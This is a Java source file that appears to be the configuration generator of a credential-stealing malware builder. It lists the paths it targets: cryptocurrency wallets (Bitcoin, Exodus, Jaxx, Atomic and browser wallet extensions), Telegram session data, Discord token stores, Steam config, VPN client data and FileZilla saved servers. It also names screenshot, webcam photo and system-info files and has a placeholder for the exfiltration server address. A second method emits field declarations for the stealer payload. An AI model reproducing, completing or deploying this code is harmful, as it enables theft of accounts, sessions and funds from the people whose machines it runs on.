package admin.cryptor;

import java.util.ArrayList;

public class CruptNastr {

    public ArrayList<String> getMasCruptNastr() {
        ArrayList<String> mas = new ArrayList<>();
        mas.add("/screenshot.png");
        mas.add("/photo.png");
        mas.add("/info.txt");
        mas.add("C:/Users/");
        mas.add("/Desktop");
        mas.add("/Pictures");
        mas.add("/crypto_wallet");
        mas.add("/AppData");
        mas.add("/Roaming");
        mas.add("/Bitcoin");
        mas.add("/Local");
        mas.add("/Exodus"); //
        mas.add("/Programs");
        mas.add("/com");
        mas.add(".liberty");
        mas.add(".jaxx");
        mas.add("/jaxx");
        mas.add("/atomic");
        mas.add("/web_extensions"); //
        mas.add("/Google");
        mas.add("/Chrome");
        mas.add("/User");
        mas.add("Data");
        mas.add("/Default");
        mas.add("/Extensions");
        mas.add("/Mozilla");
        mas.add("/Firefox");
        mas.add("/Profiles");
        mas.add("/randomstring");
        mas.add(".default");
        mas.add("/extensions");
        mas.add("/Microsoft");
        mas.add("/Edge");
        mas.add("/Process.txt");
        mas.add("/sbor_msg");
        mas.add("/Telegram");
        mas.add("Desktop");
        mas.add("/tdata");
        mas.add("/NordVPN");
        mas.add("/Surfshark");
        mas.add("/ProtonVPN");
        mas.add("/ExpressVPN");
        mas.add("/GZ_Systems");
        mas.add("/PureVPN");
        mas.add("/Appdata");
        mas.add("discord");
        mas.add("/Local");
        mas.add("Storage");
        mas.add("/leveldb");
        mas.add("Discord");
        mas.add("discordcanary"); //
        mas.add("/discordptb");
        mas.add("Auth_Keys.txt");
        mas.add("Steam");
        mas.add("steam");
        mas.add("config/");
        mas.add("Log_Info.txt");
        mas.add("steamapps/");
        mas.add("/FileZilla");
        mas.add("/recentservers");
        mas.add(".xml");
        mas.add("127.0.0.1");    // не забудь поменять!
        return mas;
    }

    public String strNastr(ArrayList<String> mas) {
        return "    //------------------\n" +
                "\n" +
                "    private final String skrin_name = "+'"'+mas.get(0)+'"'+"; // /screenshot.png\n" +
                "    private final String web_photo_name = "+'"'+mas.get(1)+'"'+"; // /photo.png\n" +
                "    private final String info_pc_name = "+'"'+mas.get(2)+'"'+"; // /info.txt\n" +
                "\n" +
                "    //------------------\n" +
                "    private final String c_user_put = "+'"'+mas.get(3)+'"'+"; // C:/Users/\n" +
                "    //------------------\n" +
                "\n" +
                "\n" +
                "    private final String Desktop = "+'"'+mas.get(4)+'"'+"; // /Desktop\n" +
                "    private final String Pictures = "+'"'+mas.get(5)+'"'+"; // /Pictures\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "    private final String crypto_wallet_put = "+'"'+mas.get(6)+'"'+"; // /crypto_wallet\n" +
                "\n" +
                "\n" +
                "    // /AppData/Roaming/Bitcoin\n" +
                "    private final String put_AppData = "+'"'+mas.get(7)+'"'+"; // /AppData\n" +
                "    private final String put_Roaming = "+'"'+mas.get(8)+'"'+"; // /Roaming\n" +
                "    private final String Bitcoin = "+'"'+mas.get(9)+'"'+"; // /Bitcoin\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/exodus\n" +
                "    private final String put_Local = "+'"'+mas.get(10)+'"'+"; // /Local\n" +
                "    private final String Exodus = "+'"'+mas.get(11)+'"'+"; // //Exodus\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/Programs/com.liberty.jaxx\n" +
                "    private final String put_Programs = "+'"'+mas.get(12)+'"'+"; // /Programs\n" +
                "    private final String put_com = "+'"'+mas.get(13)+'"'+"; // /com\n" +
                "    private final String put_liberty = "+'"'+mas.get(14)+'"'+";    // .liberty\n" +
                "    private final String put_jaxx = "+'"'+mas.get(15)+'"'+";       // .jaxx\n" +
                "    private final String Jaxx = "+'"'+mas.get(16)+'"'+"; // /jaxx\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/Programs/atomic\n" +
                "    private final String Atomic = "+'"'+mas.get(17)+'"'+"; // /atomic\n" +
                "\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "    private final String web_crypto_wallet_put = "+'"'+mas.get(18)+'"'+"; // /web_crypto_wallet\n" +
                "\n" +
                "\n" +
                "    // \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\n" +
                "    private final String put_WebWallet_Google = "+'"'+mas.get(19)+'"'+"; // \\Google\n" +
                "    private final String put_WebWallet_Chrome = "+'"'+mas.get(20)+'"'+"; // \\Chrome\n" +
                "    private final String put_WebWallet_User = "+'"'+mas.get(21)+'"'+"; // \\User\n" +
                "    private final String put_WebWallet_Data = "+'"'+mas.get(22)+'"'+"; // \" \" + Data\n" +
                "    private final String put_WebWallet_Default = "+'"'+mas.get(23)+'"'+"; // \\Default\n" +
                "    private final String put_WebWallet_Extensions = "+'"'+mas.get(24)+'"'+"; // \\Extensions\n" +
                "\n" +
                "\n" +
                "    // \\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\randomstring.default\\extensions\n" +
                "    private final String put_WebWallet_Mozilla = "+'"'+mas.get(25)+'"'+"; // \\Mozilla\n" +
                "    private final String put_WebWallet_Firefox = "+'"'+mas.get(26)+'"'+"; // \\Firefox\n" +
                "    private final String put_WebWallet_Profiles = "+'"'+mas.get(27)+'"'+"; // \\Profiles\n" +
                "    private final String put_WebWallet_randomstring = "+'"'+mas.get(28)+'"'+"; // \\randomstring\n" +
                "    private final String put_WebWallet_default = "+'"'+mas.get(29)+'"'+"; // .default\n" +
                "    private final String put_WebWallet_extensions = "+'"'+mas.get(30)+'"'+"; // \\extensions\n" +
                "\n" +
                "\n" +
                "\n" +
                "    // \\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Extensions\n" +
                "    private final String put_WebWallet_Microsoft = "+'"'+mas.get(31)+'"'+"; // \\Microsoft\n" +
                "    private final String put_WebWallet_Edge = "+'"'+mas.get(32)+'"'+"; // \\Edge\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "\n" +
                "\n" +
                "\n" +
                "    private final String Process = "+'"'+mas.get(33)+'"'+"; // /Process.txt\n" +
                "\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "    private final String sbor_msg_put = "+'"'+mas.get(34)+'"'+"; // /sbor_msg\n" +
                "\n" +
                "\n" +
                "\n" +
                "    // \\AppData\\Roaming\\Telegram Desktop\\tdata\n" +
                "    private final String put_Telegram = "+'"'+mas.get(35)+'"'+"; // \\Telegram\n" +
                "    private final String put_Desktop = "+'"'+mas.get(36)+'"'+"; // \" \" + Desktop\n" +
                "    private final String put_Telegram_tdata = "+'"'+mas.get(37)+'"'+"; // \\tdata\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/NordVPN\n" +
                "    private final String NordVPN = "+'"'+mas.get(38)+'"'+"; // /NordVPN\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/Surfshark\n" +
                "    private final String Surfshark = "+'"'+mas.get(39)+'"'+"; // /Surfshark\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/ProtonVPN\n" +
                "    private final String ProtonVPN = "+'"'+mas.get(40)+'"'+"; // /ProtonVPN\n" +
                "\n" +
                "\n" +
                "    // /AppData/Local/ExpressVPN\n" +
                "    private final String ExpressVPN = "+'"'+mas.get(41)+'"'+"; // /ExpressVPN\n" +
                "\n" +
                "\n" +
                "    // /AppData\\Local\\GZ_Systems\n" +
                "    private final String GZ_Systems = "+'"'+mas.get(42)+'"'+"; // /GZ_Systems\n" +
                "    private final String PureVPN = "+'"'+mas.get(43)+'"'+"; // /PureVPN\n" +
                "\n" +
                "\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "\n" +
                "\n" +
                "\n" +
                "    private final String diskord_Appdata = "+'"'+mas.get(44)+'"'+"; // /Appdata\n" +
                "    private final String diskord_smoll = "+'"'+mas.get(45)+'"'+"; // discord\n" +
                "    private final String diskord_Local = "+'"'+mas.get(46)+'"'+"; // /Local\n" +
                "    private final String diskord_Storage = "+'"'+mas.get(47)+'"'+"; // \" \" + Storage\n" +
                "    private final String diskord_leveldb = "+'"'+mas.get(48)+'"'+"; // /leveldb\n" +
                "    private final String diskord_big = "+'"'+mas.get(49)+'"'+"; // Discord\n" +
                "    private final String diskord_discordcanary = "+'"'+mas.get(50)+'"'+"; // discordcanary\n" +
                "    private final String diskord_discordptb = "+'"'+mas.get(51)+'"'+"; // /discordptb\n" +
                "    private final String diskord_Auth_Keys_txt = "+'"'+mas.get(52)+'"'+"; // Auth_Keys.txt\n" +
                "\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "\n" +
                "\n" +
                "\n" +
                "    private final String steam_big = "+'"'+mas.get(53)+'"'+"; // Steam\n" +
                "    private final String steam_smoll = "+'"'+mas.get(54)+'"'+"; // steam\n" +
                "    private final String steam_config = "+'"'+mas.get(55)+'"'+"; // config/\n" +
                "    private final String steam_Log_Info_txt = "+'"'+mas.get(56)+'"'+"; // Log_Info.txt\n" +
                "    private final String steam_steamapps = "+'"'+mas.get(57)+'"'+"; // steamapps/\n" +
                "\n" +
                "\n" +
                "//------------------\n" +
                "\n" +
                "    // /AppData/Roaming/FileZilla/recentservers.xml\n" +
                "    private final String fileZilla = "+'"'+mas.get(58)+'"'+"; // /FileZilla\n" +
                "    private final String recentservers = "+'"'+mas.get(59)+'"'+"; // /recentservers\n" +
                "    private final String xml = "+'"'+mas.get(60)+'"'+"; // .xml\n" +
                "\n" +
                "\n" +
                "    //------------------\n" +
                "\n" +
                "    private final String adress_server = "+'"'+mas.get(61)+'"'+"; // ip\n" +
                "\n" +
                "\n" +
                "\n" +
                "\n" +
                "    //------------------ Индивидуально\n" +
                "    \n" +
                "    " +
                "\n" +
                "\n";
    }
}
